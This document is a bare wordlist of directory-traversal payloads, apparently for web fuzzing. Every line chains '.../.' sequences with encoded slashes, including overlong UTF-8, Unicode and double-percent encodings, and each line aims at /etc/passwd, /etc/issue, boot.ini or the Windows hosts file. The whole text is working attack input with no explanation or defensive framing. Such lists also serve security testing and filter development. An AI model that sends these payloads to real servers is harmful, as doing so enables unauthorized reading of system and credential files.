-.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcpasswd -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcissue -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcboot.ini -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcpasswd -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcissue -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcboot.ini -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.../.%c0%9vetc%c0%9vpasswd -.../.%c0%9vetc%c0%9vissue -.../.%c0%9vboot.ini -.../.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.../.%c0%9v.../.%c0%9vetc%c0%9vpasswd -.../.%c0%9v.../.%c0%9vetc%c0%9vissue -.../.%c0%9v.../.%c0%9vboot.ini -.../.%c0%9v.../.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vpasswd -.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vissue -.../.%c0%9v.../.%c0%9v.../.%c0%9vboot.ini -.../.%c0%9v.../.%c0%9v.../.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vpasswd -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vissue -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vboot.ini -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vpasswd -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vissue -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vboot.ini -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vpasswd -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vetc%c0%9vissue -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vboot.ini -.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9v.../.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.../.%c0%qfetc%c0%qfpasswd -.../.%c0%qfetc%c0%qfissue -.../.%c0%qfboot.ini -.../.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.../.%c0%qf.../.%c0%qfetc%c0%qfpasswd -.../.%c0%qf.../.%c0%qfetc%c0%qfissue -.../.%c0%qf.../.%c0%qfboot.ini -.../.%c0%qf.../.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfpasswd -.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfissue -.../.%c0%qf.../.%c0%qf.../.%c0%qfboot.ini -.../.%c0%qf.../.%c0%qf.../.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfpasswd -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfissue -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfboot.ini -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfpasswd -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfissue -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfboot.ini -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfpasswd -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfetc%c0%qfissue -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfboot.ini -.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qf.../.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.../.%c1%8setc%c1%8spasswd -.../.%c1%8setc%c1%8sissue -.../.%c1%8sboot.ini -.../.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.../.%c1%8s.../.%c1%8setc%c1%8spasswd -.../.%c1%8s.../.%c1%8setc%c1%8sissue -.../.%c1%8s.../.%c1%8sboot.ini -.../.%c1%8s.../.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8spasswd -.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8sissue -.../.%c1%8s.../.%c1%8s.../.%c1%8sboot.ini -.../.%c1%8s.../.%c1%8s.../.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8spasswd -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8sissue -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8sboot.ini -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8spasswd -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8sissue -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8sboot.ini -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8spasswd -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8setc%c1%8sissue -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8sboot.ini -.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8s.../.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.../.%c1%1cetc%c1%1cpasswd -.../.%c1%1cetc%c1%1cissue -.../.%c1%1cboot.ini -.../.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.../.%c1%1c.../.%c1%1cetc%c1%1cpasswd -.../.%c1%1c.../.%c1%1cetc%c1%1cissue -.../.%c1%1c.../.%c1%1cboot.ini -.../.%c1%1c.../.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cpasswd -.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cissue -.../.%c1%1c.../.%c1%1c.../.%c1%1cboot.ini -.../.%c1%1c.../.%c1%1c.../.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cpasswd -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cissue -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cboot.ini -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cpasswd -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cissue -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cboot.ini -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cpasswd -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cetc%c1%1cissue -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cboot.ini -.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1c.../.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.../.%c1%afetc%c1%afpasswd -.../.%c1%afetc%c1%afissue -.../.%c1%afboot.ini -.../.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.../.%c1%af.../.%c1%afetc%c1%afpasswd -.../.%c1%af.../.%c1%afetc%c1%afissue -.../.%c1%af.../.%c1%afboot.ini -.../.%c1%af.../.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afpasswd -.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afissue -.../.%c1%af.../.%c1%af.../.%c1%afboot.ini -.../.%c1%af.../.%c1%af.../.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afpasswd -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afissue -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afboot.ini -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afpasswd -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afissue -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afboot.ini -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afpasswd -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afetc%c1%afissue -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afboot.ini -.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%af.../.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.../.%bg%qfetc%bg%qfpasswd -.../.%bg%qfetc%bg%qfissue -.../.%bg%qfboot.ini -.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.../.%bg%qf.../.%bg%qfetc%bg%qfpasswd -.../.%bg%qf.../.%bg%qfetc%bg%qfissue -.../.%bg%qf.../.%bg%qfboot.ini -.../.%bg%qf.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfpasswd -.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfissue -.../.%bg%qf.../.%bg%qf.../.%bg%qfboot.ini -.../.%bg%qf.../.%bg%qf.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfpasswd -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfissue -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfboot.ini -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfpasswd -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfissue -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfboot.ini -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfpasswd -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfetc%bg%qfissue -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfboot.ini -.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qf.../.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.../.%u2215etc%u2215passwd -.../.%u2215etc%u2215issue -.../.%u2215boot.ini -.../.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.../.%u2215.../.%u2215etc%u2215passwd -.../.%u2215.../.%u2215etc%u2215issue -.../.%u2215.../.%u2215boot.ini -.../.%u2215.../.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.../.%u2215.../.%u2215.../.%u2215etc%u2215passwd -.../.%u2215.../.%u2215.../.%u2215etc%u2215issue -.../.%u2215.../.%u2215.../.%u2215boot.ini -.../.%u2215.../.%u2215.../.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.../.%u2215.../.%u2215.../.%u2215.../.%u2215etc%u2215passwd -.../.%u2215.../.%u2215.../.%u2215.../.%u2215etc%u2215issue -.../.%u2215.../.%u2215.../.%u2215.../.%u2215boot.ini -.../.%u2215.../.%u2215.../.%u2215.../.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215etc%u2215passwd -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215etc%u2215issue -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215boot.ini -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215etc%u2215passwd -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215etc%u2215issue -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215boot.ini -.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215.../.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.../.%u2216etc%u2216passwd -.../.%u2216etc%u2216issue -.../.%u2216boot.ini -.../.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.../.%u2216.../.%u2216etc%u2216passwd -.../.%u2216.../.%u2216etc%u2216issue -.../.%u2216.../.%u2216boot.ini -.../.%u2216.../.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.../.%u2216.../.%u2216.../.%u2216etc%u2216passwd -.../.%u2216.../.%u2216.../.%u2216etc%u2216issue -.../.%u2216.../.%u2216.../.%u2216boot.ini -.../.%u2216.../.%u2216.../.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.../.%u2216.../.%u2216.../.%u2216.../.%u2216etc%u2216passwd -.../.%u2216.../.%u2216.../.%u2216.../.%u2216etc%u2216issue -.../.%u2216.../.%u2216.../.%u2216.../.%u2216boot.ini -.../.%u2216.../.%u2216.../.%u2216.../.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216etc%u2216passwd -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216etc%u2216issue -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216boot.ini -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216etc%u2216passwd -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216etc%u2216issue -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216boot.ini -.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216.../.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.../.%uEFC8etc%uEFC8passwd -.../.%uEFC8etc%uEFC8issue -.../.%uEFC8boot.ini -.../.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.../.%uEFC8.../.%uEFC8etc%uEFC8passwd -.../.%uEFC8.../.%uEFC8etc%uEFC8issue -.../.%uEFC8.../.%uEFC8boot.ini -.../.%uEFC8.../.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8passwd -.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8issue -.../.%uEFC8.../.%uEFC8.../.%uEFC8boot.ini -.../.%uEFC8.../.%uEFC8.../.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8passwd -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8issue -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8boot.ini -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8passwd -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8issue -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8boot.ini -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8passwd -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8etc%uEFC8issue -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8boot.ini -.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8.../.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.../.%uF025etc%uF025passwd -.../.%uF025etc%uF025issue -.../.%uF025boot.ini -.../.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.../.%uF025.../.%uF025etc%uF025passwd -.../.%uF025.../.%uF025etc%uF025issue -.../.%uF025.../.%uF025boot.ini -.../.%uF025.../.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.../.%uF025.../.%uF025.../.%uF025etc%uF025passwd -.../.%uF025.../.%uF025.../.%uF025etc%uF025issue -.../.%uF025.../.%uF025.../.%uF025boot.ini -.../.%uF025.../.%uF025.../.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.../.%uF025.../.%uF025.../.%uF025.../.%uF025etc%uF025passwd -.../.%uF025.../.%uF025.../.%uF025.../.%uF025etc%uF025issue -.../.%uF025.../.%uF025.../.%uF025.../.%uF025boot.ini -.../.%uF025.../.%uF025.../.%uF025.../.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025etc%uF025passwd -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025etc%uF025issue -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025boot.ini -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025etc%uF025passwd -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025etc%uF025issue -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025boot.ini -.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025.../.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.../.%%32%%66etc%%32%%66passwd -.../.%%32%%66etc%%32%%66issue -.../.%%32%%66boot.ini -.../.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.../.%%32%%66.../.%%32%%66etc%%32%%66passwd -.../.%%32%%66.../.%%32%%66etc%%32%%66issue -.../.%%32%%66.../.%%32%%66boot.ini -.../.%%32%%66.../.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66passwd -.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66issue -.../.%%32%%66.../.%%32%%66.../.%%32%%66boot.ini -.../.%%32%%66.../.%%32%%66.../.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66passwd -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66issue -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66boot.ini -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66passwd -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66issue -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66boot.ini -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66passwd -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66etc%%32%%66issue -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66boot.ini -.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66.../.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.../.%%35%%63etc%%35%%63passwd -.../.%%35%%63etc%%35%%63issue -.../.%%35%%63boot.ini -.../.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.../.%%35%%63.../.%%35%%63etc%%35%%63passwd -.../.%%35%%63.../.%%35%%63etc%%35%%63issue -.../.%%35%%63.../.%%35%%63boot.ini -.../.%%35%%63.../.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63passwd -.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63issue -.../.%%35%%63.../.%%35%%63.../.%%35%%63boot.ini -.../.%%35%%63.../.%%35%%63.../.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63passwd -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63issue -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63boot.ini -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63passwd -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63issue -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63boot.ini -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63passwd -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63etc%%35%%63issue -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63boot.ini -.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63.../.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.../.%e0%80%afetc%e0%80%afpasswd -.../.%e0%80%afetc%e0%80%afissue -.../.%e0%80%afboot.ini -.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.../.%e0%80%af.../.%e0%80%afetc%e0%80%afpasswd -.../.%e0%80%af.../.%e0%80%afetc%e0%80%afissue -.../.%e0%80%af.../.%e0%80%afboot.ini -.../.%e0%80%af.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afpasswd -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afissue -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afboot.ini -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afpasswd -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afissue -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afboot.ini -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afpasswd -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afissue -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afboot.ini -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afpasswd -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afetc%e0%80%afissue -.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afboot.ini 